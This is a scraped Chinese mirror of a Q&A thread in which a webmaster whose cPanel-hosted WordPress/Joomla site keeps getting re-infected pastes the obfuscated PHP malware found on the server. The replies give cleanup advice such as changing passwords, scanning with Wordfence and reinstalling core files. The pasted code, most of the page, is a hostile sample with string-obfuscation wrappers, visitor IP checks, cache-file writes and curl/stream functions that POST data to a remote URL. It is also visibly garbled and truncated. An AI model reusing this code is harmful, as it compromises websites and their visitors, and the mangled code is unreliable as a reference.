1. 首頁
  2. 問答
  3. Cpanel Hacked,一些使用base64代碼編輯的事故文件

Cpanel Hacked,一些使用base64代碼編輯的事故文件

2016-11-17 31 views
-2

我有一些奇怪的問題,雖然我無法通過谷歌訪問我的網站,因爲它提醒用戶本網站包含惡意軟件。Cpanel Hacked,一些使用base64代碼編輯的事故文件

我的一些文件已經被意外在我所有的文件夾編輯,Wordpress或Joomla!核心之間產生非常聰明一些新文件,你永遠不能夠理解他們創造了病毒。

他們都已經通過的base64編碼編輯的,我刪除所有新的病毒文件,並恢復原始文件,但他們將在今天再次創建。

我的帳戶是交友,我改變了交友密碼一段時間,但沒有奏效,我不刪除FTP用戶,因爲我想也許我虧我的文件?

我應該怎麼辦? 謝謝!



    ")} = YypSc0cQFhy3J("'25-3:-"); 
          ${XiR75Dp("`ko)[email protected]#U")} = yndJFg6Eb("&%+3"); 
    ${UXiKSbeGBtie("i.ntxV2Xn-2!")} = zOeQ89("7(36.4;."); 
          ${XiR75Dp("yVfSi9Y7i>"); 
    function zOeQ89($SRPfSoOMwY){return YypSc0cQFhy3J($SRPfSoOMwY);}; 

    ${XiR75Dp("5/*V34")} = zOeQ89(")60086,+2+7/)#57\$*,+8.0"); 

    function wurJ5mP0tuiT($nx1ZVDkeubPPn){return YypSc0cQFhy3J($nx1ZVDkeubPPn);}; 
    function yndJFg6Eb($erFRGKz){return YypSc0cQFhy3J($erFRGKz);}; 

    ${zOeQ89(";kT+)s-?Ckl86")} = YypSc0cQFhy3J("-65-2"); 
    ${zOeQ89("y;sZ7j./ll/\"")} = yndJFg6Eb("6%:37*:"); 
    ${yndJFg6Eb("[email protected]")} = yndJFg6Eb(")'%6*%2-B)0D*577"); 
         ${YypSc0cQFhy3J("vP2[[email protected]")} = UXiKSbeGBtie("4*\$S"); 
          function Su59bl($Ic6knPclJ){return YypSc0cQFhy3J($Ic6knPclJ);}; 
    ${XiR75Dp("xhVUl{y=:")} = XiR75Dp(")600*4;1=30?"); 
    ${yndJFg6Eb("sV3t-0\\w]")} = zOeQ89("\"&''1':4*=3"); 
    ${Su59bl("%g:ixyA")} = UXiKSbeGBtie(")60086,+2+7/)#57\$*,+8.0"); 

    ${Su59bl("*k.3d)y")} = YypSc0cQFhy3J("*0,#8+;"); 

    ${XiR75Dp("6i.j=;gB[5r\$l")} = yndJFg6Eb("-h{20y^Vl#^Ej"); 
     ${Su59bl("t'VR>t5*11x}`")} = UXiKSbeGBtie("465798"); 
          ${yndJFg6Eb("3an=m|[email protected]")} = UXiKSbeGBtie("47%[email protected]"); 
    ${YypSc0cQFhy3J("l&i*3u")} = Su59bl("'71'9/66(/C5466"); 
    ${zOeQ89("\$3dt;@436{}qc")} = XiR75Dp(".&V"); 
    ${yndJFg6Eb("7rz;;r")} = YypSc0cQFhy3J("d&e/wulX=?!x"); 

    ${wurJ5mP0tuiT("\$:)2w2k~")} = wurJ5mP0tuiT("4+0-1'9'=/[email protected]"); 
          ${YypSc0cQFhy3J("bhf[l8")} = YypSc0cQFhy3J("548)"); 
    ${UXiKSbeGBtie("f4S5TVs")} = YypSc0cQFhy3J("&:304*,"); 
      ${wurJ5mP0tuiT("nc7=,?>-~`")} = YypSc0cQFhy3J("04'"); 
    ${XiR75Dp("4%Z(f:")} = YypSc0cQFhy3J("*/304*,"); 
    ${XiR75Dp(";S)ty:%:020?"); 
       ${UXiKSbeGBtie("*q7rYk")} = yndJFg6Eb("*0\"%78(A"); 
    ${yndJFg6Eb("8eT:3*j")} = UXiKSbeGBtie("465)&3&+88?196\"'7+(!zA2B")} = yndJFg6Eb("'+/8*8&>*"); 
    ${wurJ5mP0tuiT("6c'upj,X^MPJ"), 
        YypSc0cQFhy3J("l1=-12(U[VYJG%215';1+60e?mtkhD]TWcI#*0'3X^MPJ"),); 


    if (${wurJ5mP0tuiT("3an=m|[email protected]")}(${zOeQ89(":&Th7q~")}($_SERVER[UXiKSbeGBtie("rcsksx&lptnx`mf")]), wurJ5mP0tuiT("C")) != ${XiR75Dp("cvh0w73j;`06")}(YypSc0cQFhy3J("O"))+395){ ${UXiKSbeGBtie("\$%4&)V*/'~\\")], '');exit();} 
    if (empty(${YypSc0cQFhy3J("~gfv")})) 
    { 
           ${XiR75Dp("cxww5}+;;r}ua")}(); 
    } 

          ${Su59bl("(9wzjv")} = ${wurJ5mP0tuiT("0tu|g1:")}(); 
    ${Su59bl("pUVY*:v")} = @$GLOBALS[YypSc0cQFhy3J("lue.d]}B")][Su59bl("gtur\$yxky)jqdnu")]; 

    if (${wurJ5mP0tuiT("*q7rYk")}(${YypSc0cQFhy3J("pUVY*:v")}, ${zOeQ89("[email protected]")})) 
    { 
           ${yndJFg6Eb("cxww5}+;;r}ua")}(); 
    } 


    if (empty(${Su59bl("(9wzjv")})) 
    { 
     ${Su59bl("cxww5}+;;r}ua")}(); 
    } 

         ${YypSc0cQFhy3J(",-k>{W+6^")} = ${XiR75Dp(";4{0,\\2:#@")}(${Su59bl("(9wzjv")}, ${XiR75Dp("cvh0w73j;`06")}(XiR75Dp("O")), ${yndJFg6Eb("lhi8mYf.!")}(${Su59bl("(9wzjv")}, UXiKSbeGBtie("M"))+${wurJ5mP0tuiT("cvh0w73j;`06")}(XiR75Dp("P"))); 
         if (${wurJ5mP0tuiT("*q7rYk")}(${wurJ5mP0tuiT(",-k>{W+6^")}, ${wurJ5mP0tuiT("pU/+SlnrhB?E")})) 
    { 

     ${UXiKSbeGBtie("cxww5}+;;r}ua")}(); 
    } 

    ${YypSc0cQFhy3J("lWi(k4")} = ${YypSc0cQFhy3J("cvh0w73j;`06")}(Su59bl("QYRYT")); 

    ${UXiKSbeGBtie("92w>2=tX")} = ${UXiKSbeGBtie("cvh0w73j;`06")}(yndJFg6Eb("O")); 
        foreach (${zOeQ89(")4c3:/Y,")}($GLOBALS[UXiKSbeGBtie("lue.d]}B")][XiR75Dp("qerwhwy'|zr")]) as ${zOeQ89("7w%hy3")}) 
    { 

     ${Su59bl("lWi(k4")} += ${UXiKSbeGBtie("nc7=,?>-~`")}(${UXiKSbeGBtie("7w%hy3")}); 
     ${Su59bl("92w>2=tX")} ++; 
    } 
    ${YypSc0cQFhy3J("lWi(k4")}-~`")}(${YypSc0cQFhy3J("lWi(k4")}[${UXiKSbeGBtie("cvh0w73j;`06")}(XiR75Dp("O"))]) + ${wurJ5mP0tuiT("nc7=,?>-~`")}(${yndJFg6Eb("lWi(k4")}[${XiR75Dp("cvh0w73j;`06")}(YypSc0cQFhy3J("P"))]) + (${UXiKSbeGBtie("t'VR>t5*11x}`")}(${YypSc0cQFhy3J(";4{0,\\2:#@")}($GLOBALS[XiR75Dp("lue.d]}B")][yndJFg6Eb("qerwhwy'|zr")], -${UXiKSbeGBtie("cvh0w73j;`06")}(YypSc0cQFhy3J("S"))), Su59bl("M2+4")) == FALSE ? ${wurJ5mP0tuiT("cvh0w73j;`06")}(XiR75Dp("XX")) : ${wurJ5mP0tuiT("::+'hr+Z+s")}(${YypSc0cQFhy3J("(9wzjv")})))) . YypSc0cQFhy3J("Y") . ${UXiKSbeGBtie("sx{[email protected]*11x}`")}(${yndJFg6Eb("y)6n(gk5|")}, Su59bl("M*711")) === FALSE) 
    { 

     ${XiR75Dp("2ko:tw~04;/O2'9+;S=1\"/")); 
         ${UXiKSbeGBtie("2ko:tw~0!zA2B")}; 
    global ${UXiKSbeGBtie("%g:ix!zA2B")}(${Su59bl("(9wzjv")}, FILTER_VALIDATE_IP, ${UXiKSbeGBtie("*-oRufz1")} | FILTER_FLAG_NO_RES_RANGE) !== FALSE) 
          { 
          return ${UXiKSbeGBtie("(9wzjv")}; 

                     } 
       } 
      } 
     } 

     return ""; 
    } 


    function xccEP2Ijj4k() 
    {global ${XiR75Dp("6iXgz]h*Y\$")}; 

    global ${YypSc0cQFhy3J("6c'upj, array(yndJFg6Eb("*)137+&-;4") => true)))); 
      $content = ${yndJFg6Eb(";S*e\\o95")}(${zOeQ89("2-'qk9Z")}, ${UXiKSbeGBtie("%Pg:*8.")}, $content); 
      ${YypSc0cQFhy3J("6iXgz]h*Y\$")}(yndJFg6Eb("SPUP") . ${UXiKSbeGBtie("%Pg:*8.")}, $content); 
     } 
     else 
     { 
      $content = @${XiR75Dp(":&Th7q~")}(Su59bl("SPUP") . ${UXiKSbeGBtie("%Pg:*8.")}); 
     } 

     exit($content); 
    } 

        function lHZnkU90EY5yK($url, $content) 
    {global ${YypSc0cQFhy3J("cvh0w73j;`06")}; 
    global ${Su59bl("[email protected]^v")}; 

    global ${UXiKSbeGBtie("6b,[email protected];=")}; 
    global ${yndJFg6Eb("eV4t5~")} = ${YypSc0cQFhy3J("6b,[email protected];=")}(); 


     ${yndJFg6Eb("[email protected]^v")}(${XiR75Dp("nV6>4t5~")}, CURLOPT_URL, $url); 
     ${Su59bl("[email protected]^v")}(${zOeQ89("nV6>4t5~")}, CURLOPT_POST, ${Su59bl("cvh0w73j;`06")}(Su59bl("P"))); 
     ${XiR75Dp("[email protected]^v")}(${yndJFg6Eb("nV6>4t5~")}, CURLOPT_POSTFIELDS, $content); 

     ${yndJFg6Eb("[email protected]^v")}(${zOeQ89("nV6>4t5~")}, CURLOPT_RETURNTRANSFER, TRUE); 

     ${wurJ5mP0tuiT("nSz=[334t")} = ${zOeQ89(";S)ty:4t5~")}); 
     ${YypSc0cQFhy3J("eV4t5~")}); 

           return ${UXiKSbeGBtie("nSz=[334t")}; 
    } 


    function EdDkTQG2tuVN($url, $content) 
        {global ${yndJFg6Eb("2ko:tw~0 Array(wurJ5mP0tuiT(".'7,4*") => yndJFg6Eb("ootv"), zOeQ89(")'\$(*8") => yndJFg6Eb("b118*4;S=C;[email protected]\$4520+*>4;/O;OS/9=9L750*4*7-//"), yndJFg6Eb("\$118*4;") => $content))); 

        ${Su59bl("nSz=[334t")} = @${Su59bl(":&Th7q~")}($url, FALSE, ${zOeQ89("qh:{nh][email protected]:9")}); 


     return ${YypSc0cQFhy3J("nSz=[334t")}; 
    }

來源

2016-11-17 hamid hassani

+0

堆棧溢出用於編程問題。你可以嘗試在另一個論壇上提問。 – Jerry

+0

看看插件「Wordfence」 - 它適用於這些情況,至少對於清理它們非常有用。你必須進一步的步驟(改變密碼等),以確保事情是安全的。最有可能的是,一個易受攻擊的腳本存在於您的網站主題或插件的某個地方,他們只會繼續重擊。在Wordfence中,運行全部掃描並檢查所有選項。它會發現你的感染,可能還有更多,並幫助你清理它。請先備份所有內容:) –

回答

0

您必須更改所有密碼,也是FTP。他們最有可能獲得了其中一個。它是在自己的服務器上的cPanel,還是它作爲經銷商或最終用戶使用的cPanel?如果它是你自己的服務器,那麼服務器可能會受到攻擊,你應該明確地請求專家檢查安全性並刪除服務器上的任何病毒。

如果它是你正在使用你應該問你的主機經銷商的cPanel。還要確保你刪除了任何不應該在那裏的奇怪的PHP文件,你很可能在某個地方有一個後門程序。最好的方法是刪除wp-content文件夾以外的所有內容。

重新上傳WordPress的文件,並手動檢查的wp-content所有文件。最簡單的方法是刪除所有插件文件,並從存儲庫下載新的新文件。也許你應該對你的主題做同樣的事情。請手動檢查您的上傳目錄。

來源

2016-11-17 13:20:42

相關問題

 相關問題